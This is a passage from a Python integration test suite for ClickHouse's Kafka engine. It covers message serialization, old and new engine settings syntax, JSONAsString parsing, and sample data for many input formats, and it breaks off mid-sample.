            {'name': 'id', 'type': 'long'},
            {'name': 'blockNo', 'type': 'int'},
            {'name': 'val1', 'type': 'string'},
            {'name': 'val2', 'type': 'float'},
            {'name': 'val3', 'type': 'int'}
        ]
    })
    buf = io.BytesIO()
    # DataFileWriter (rather than a bare DatumWriter/BinaryEncoder) is
    # used because it embeds the schema in the output.
    writer = avro.datafile.DataFileWriter(buf, avro.io.DatumWriter(), schema)
    rows = value if isinstance(value, list) else [value]
    for row in rows:
        writer.append(row)
    writer.flush()
    raw_bytes = buf.getvalue()
    writer.close()
    buf.close()
    return raw_bytes
def avro_confluent_message(schema_registry_client, value):
    # type: (CachedSchemaRegistryClient, dict) -> str
    """Encode *value* in the Confluent wire format via the schema registry."""
    serializer = MessageSerializer(schema_registry_client)
    schema = avro.schema.make_avsc_object({
        'name': 'row',
        'type': 'record',
        'fields': [
            {'name': 'id', 'type': 'long'},
            {'name': 'blockNo', 'type': 'int'},
            {'name': 'val1', 'type': 'string'},
            {'name': 'val2', 'type': 'float'},
            {'name': 'val3', 'type': 'int'}
        ]
    })
    return serializer.encode_record_with_schema('test_subject', schema, value)
# Tests
def test_kafka_settings_old_syntax(kafka_cluster):
# Engine declared with positional Kafka(...) arguments; verifies the
# configured macros, message consumption, and the default client_id.
# NOTE(review): indentation in this dump is mangled and the whitespace
# inside the multiline literals below may differ from the original
# (TSV columns are presumably tab-separated) -- left byte-identical.
assert TSV(instance.query("SELECT * FROM system.macros WHERE macro like 'kafka%' ORDER BY macro",
ignore_error=True)) == TSV('''kafka_broker kafka1
kafka_client_id instance
kafka_format_json_each_row JSONEachRow
kafka_group_name_new new
kafka_group_name_old old
kafka_topic_new new
kafka_topic_old old
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka('{kafka_broker}:19092', '{kafka_topic_old}', '{kafka_group_name_old}', '{kafka_format_json_each_row}', '\\n')
SETTINGS kafka_commit_on_select = 1;
''')
# Don't insert malformed messages since old settings syntax
# doesn't support skipping of broken messages.
messages = []
for i in range(50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'old', messages)
# Poll until the expected rows show up.
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
# Old syntax does not set a client_id, so the default one is used.
members = describe_consumer_group(kafka_cluster, 'old')
assert members[0]['client_id'] == 'ClickHouse-instance-test-kafka'
# text_desc = kafka_cluster.exec_in_container(kafka_cluster.get_container_id('kafka1'),"kafka-consumer-groups --bootstrap-server localhost:9092 --describe --members --group old --verbose"))
def test_kafka_settings_new_syntax(kafka_cluster):
# Engine declared with SETTINGS-style configuration; verifies that
# broken messages are skipped and the custom client_id is applied.
# NOTE(review): indentation in this dump is mangled -- code left
# byte-identical, only comments added.
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = '{kafka_broker}:19092',
kafka_topic_list = '{kafka_topic_new}',
kafka_group_name = '{kafka_group_name_new}',
kafka_format = '{kafka_format_json_each_row}',
kafka_row_delimiter = '\\n',
kafka_commit_on_select = 1,
kafka_client_id = '{kafka_client_id} test 1234',
kafka_skip_broken_messages = 1;
''')
messages = []
for i in range(25):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Insert couple of malformed messages.
kafka_produce(kafka_cluster, 'new', ['}{very_broken_message,'])
kafka_produce(kafka_cluster, 'new', ['}another{very_broken_message,'])
messages = []
for i in range(25, 50):
messages.append(json.dumps({'key': i, 'value': i}))
kafka_produce(kafka_cluster, 'new', messages)
# Poll until the expected rows show up despite the two broken messages.
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
# The kafka_client_id setting should be honoured verbatim.
members = describe_consumer_group(kafka_cluster, 'new')
assert members[0]['client_id'] == 'instance test 1234'
def test_kafka_json_as_string(kafka_cluster):
# JSONAsString format: each message becomes one String row; empty
# messages and null-value tombstones must be skipped with a log entry.
# NOTE(review): indentation in this dump is mangled -- code left
# byte-identical, only comments added.
kafka_produce(kafka_cluster, 'kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }',
'{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
# 'tombstone' record (null value) = marker of deleted record
producer = KafkaProducer(bootstrap_servers="localhost:{}".format(cluster.kafka_port), value_serializer=producer_serializer, key_serializer=producer_serializer)
producer.send(topic='kafka_json_as_string', key='xxx')
producer.flush()
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_commit_on_select = 1,
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
# The empty message must be reported as yielding no rows.
assert instance.contains_in_log(
"Parsing of message (topic: kafka_json_as_string, partition: 0, offset: [0-9]*) return no rows")
def test_kafka_formats(kafka_cluster):
schema_registry_client = CachedSchemaRegistryClient('http://localhost:{}'.format(kafka_cluster.schema_registry_port))
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV': {
'data_sample': [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV': {
'data_sample': [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV': {
'data_sample': [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames': {
'data_sample': [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values': {
'data_sample': [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'TSVWithNamesAndTypes': {
'data_sample': [
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\nInt64\tUInt16\tString\tFloat32\tUInt8\n0\t0\tAM\t0.5\t1\n',
# '',
# On empty message exception happens: Cannot parse input: expected '\n' at end of stream.
# /src/IO/ReadHelpers.cpp:84: DB::throwAtAssertionFailed(char const*, DB::ReadBuffer&) @ 0x15c8d8ec in /usr/bin/clickhouse
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:24: DB::skipTSVRow(DB::ReadBuffer&, unsigned long) @ 0x1df92fac in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TabSeparatedRowInputFormat.cpp:168: DB::TabSeparatedRowInputFormat::readPrefix() @ 0x1df92df0 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'CustomSeparated' : {
'data_sample' : [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
},
'Template' : {
'data_sample' : [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
],
'extra_settings': ", format_template_row='template_row.format'"
},
'Regexp': {
'data_sample': [
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 1, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 2, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 3, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 4, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 5, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 6, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 7, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 8, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 9, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 10, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 11, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 12, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 13, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 14, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)\n(id = 15, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
'(id = 0, blockNo = 0, val1 = "AM", val2 = 0.5, val3 = 1)',
# ''
# On empty message exception happens: Line "" doesn't match the regexp.: (at row 1)
# /src/Processors/Formats/Impl/RegexpRowInputFormat.cpp:140: DB::RegexpRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df82fcb in /usr/bin/clickhouse
],
'extra_settings': r", format_regexp='\(id = (.+?), blockNo = (.+?), val1 = \"(.+?)\", val2 = (.+?), val3 = (.+?)\)', format_regexp_escaping_rule='Escaped'"
},
## BINARY FORMATS
# dumped with
# clickhouse-client ... | xxd -ps -c 200 | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
'Native': {
'data_sample': [
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
b'\x05\x0f\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01',
b'\x05\x01\x02\x69\x64\x05\x49\x6e\x74\x36\x34\x00\x00\x00\x00\x00\x00\x00\x00\x07\x62\x6c\x6f\x63\x6b\x4e\x6f\x06\x55\x49\x6e\x74\x31\x36\x00\x00\x04\x76\x61\x6c\x31\x06\x53\x74\x72\x69\x6e\x67\x02\x41\x4d\x04\x76\x61\x6c\x32\x07\x46\x6c\x6f\x61\x74\x33\x32\x00\x00\x00\x3f\x04\x76\x61\x6c\x33\x05\x55\x49\x6e\x74\x38\x01',
# ''
# On empty message exception happens: DB::Exception: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/VarInt.h:135: void DB::readVarUIntImpl<false>(unsigned long&, DB::ReadBuffer&) @ 0x15c68bb7 in /usr/bin/clickhouse
# /src/IO/VarInt.h:149: DB::readVarUInt(unsigned long&, DB::ReadBuffer&) @ 0x15c68844 in /usr/bin/clickhouse
# /src/DataStreams/NativeBlockInputStream.cpp:124: DB::NativeBlockInputStream::readImpl() @ 0x1d3e2778 in /usr/bin/clickhouse
# /src/DataStreams/IBlockInputStream.cpp:60: DB::IBlockInputStream::read() @ 0x1c9c92fd in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/NativeFormat.h:42: DB::NativeInputFormatFromNativeBlockInputStream::generate() @ 0x1df1ea79 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'MsgPack': {
'data_sample': [
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x01\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x02\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x03\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x04\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x05\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x06\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x07\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x08\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x09\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0a\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0b\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0c\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0d\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0e\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01\x0f\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
b'\x00\x00\xa2\x41\x4d\xca\x3f\x00\x00\x00\x01',
# ''
# On empty message exception happens: Unexpected end of file while parsing msgpack object.: (at row 1)
# coming from Processors/Formats/Impl/MsgPackRowInputFormat.cpp:170
],
},
'RowBinary': {
'data_sample': [
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01',
b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x09\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x41\x4d\x00\x00\x00\x3f\x01\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x